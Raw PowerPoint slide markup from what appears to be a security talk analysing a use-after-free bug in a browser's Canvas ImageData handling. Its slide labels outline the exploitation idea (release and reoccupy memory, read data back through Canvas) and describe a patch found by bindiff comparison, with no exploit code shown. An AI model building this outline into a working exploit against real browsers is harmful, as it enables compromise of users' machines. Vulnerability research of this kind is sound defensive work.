                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2218226B-17BA-41EA-9578-4075222DBE86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661773" y="3904929"/>
            <a:ext cx="2249665" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subfunction call</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB6B4EE-E7A0-40C8-A8EA-DAF3981CBE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762292" y="5625958"/>
            <a:ext cx="3633580" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subsequent JS functions</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3A0BCE-D69F-49FB-BB9A-C1E2FC2D2E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007775" y="7365294"/>
            <a:ext cx="1833312" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canvas API</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A0B67E-BE04-4ED6-B126-6E571FC921A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4236190" y="3945618"/>
            <a:ext cx="1833312" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cache pointer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FDCDEE4-4FE6-44C6-B381-A7C803C00AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971906" y="6031609"/>
            <a:ext cx="2906126" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Release and occupy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB7C71B-2529-4F68-9267-7AAB41DB2EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5151944" y="7617182"/>
            <a:ext cx="4541974" cy="772776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object to Canvas and read it out</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35479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6" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27"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Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC9F3990-182F-46B9-89EB-D9CF5C999644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1103665" y="3569056"/>
            <a:ext cx="6077432" cy="2010579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B7E942-E89C-42D6-8747-09639D10A62B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1103665" y="5572311"/>
            <a:ext cx="6106411" cy="911404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1250934F-E8D6-48C2-8FA4-E614B97ABEE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083909" y="6478551"/>
            <a:ext cx="6077432" cy="349890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="连接符: 肘形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16FDCC2-FAE5-49C7-9326-E3E7CBF19756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="24" idx="3"/>
            <a:endCxn id="26" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7202829" y="4217988"/>
            <a:ext cx="2403509" cy="352696"/>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4" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1BC25B-5696-4B68-939C-5AB6ACA307A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5050649" y="4489095"/>
            <a:ext cx="2152180" cy="16317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D22D7CAF-23E7-4C65-8023-33C4AB1ED9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7463092" y="3694768"/>
            <a:ext cx="4286492" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uint8ClampedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C158900-9AAA-4954-8AF7-09903CD8E6D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="6836109"/>
            <a:ext cx="6077432" cy="1985243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0B393A-76FB-4601-A3B2-CE9C4DDA1D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="8916151"/>
            <a:ext cx="2696538" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ArrayBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9F5C0CC-1433-46BE-83BB-0CA2300E78D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5003377" y="7559722"/>
            <a:ext cx="2152180" cy="17495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DC250C25-B363-4626-A3B9-736E9E6259B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2787258" y="4669981"/>
            <a:ext cx="2152180" cy="17495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5F898B8-9A2B-4F88-9147-84F0DB3869F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7712690" y="8357336"/>
            <a:ext cx="4163894" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object contains a pointer to the Uint8ClampedArray object buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="矩形 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4B40A5-B7C1-4DC8-9485-858F40BA6F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1078125" y="6661149"/>
            <a:ext cx="4779750" cy="167291"/>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49" name="连接符: 肘形 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BCDC78-F0BB-47A1-95FD-077B8511720D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="1"/>
            <a:endCxn id="47" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1078125" y="4570684"/>
            <a:ext cx="3972524" cy="2174110"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 105755"/>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1" name="连接符: 肘形 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A8DDBB-CF51-4938-8001-367F5BBB2FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="54" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4939438" y="4757460"/>
            <a:ext cx="1140029" cy="1541163"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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53" name="连接符: 肘形 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CDC0E96-CE6A-4B4C-A3AB-EDCC5E456EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7155557" y="7647201"/>
            <a:ext cx="557133" cy="1618076"/>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4" name="矩形 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DD42FC-A33B-42D0-9751-D55D90A55008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5003377" y="6298623"/>
            <a:ext cx="2152180" cy="17495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57" name="连接符: 肘形 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C0938E-8E64-47E3-8970-424701B2AF79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="54" idx="0"/>
            <a:endCxn id="29" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5536397" y="7016652"/>
            <a:ext cx="1086140" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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59" name="文本框 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8563C428-8D8D-41F1-B77B-A0943734489A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072404" y="2581809"/>
            <a:ext cx="9176496" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> structure analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2893627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3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Canvas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>: Patch Analysis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="文本框 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8563C428-8D8D-41F1-B77B-A0943734489A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072404" y="2581809"/>
            <a:ext cx="9176496" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Through the patch comparison of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>bindiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>, we can find the patch to delete the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
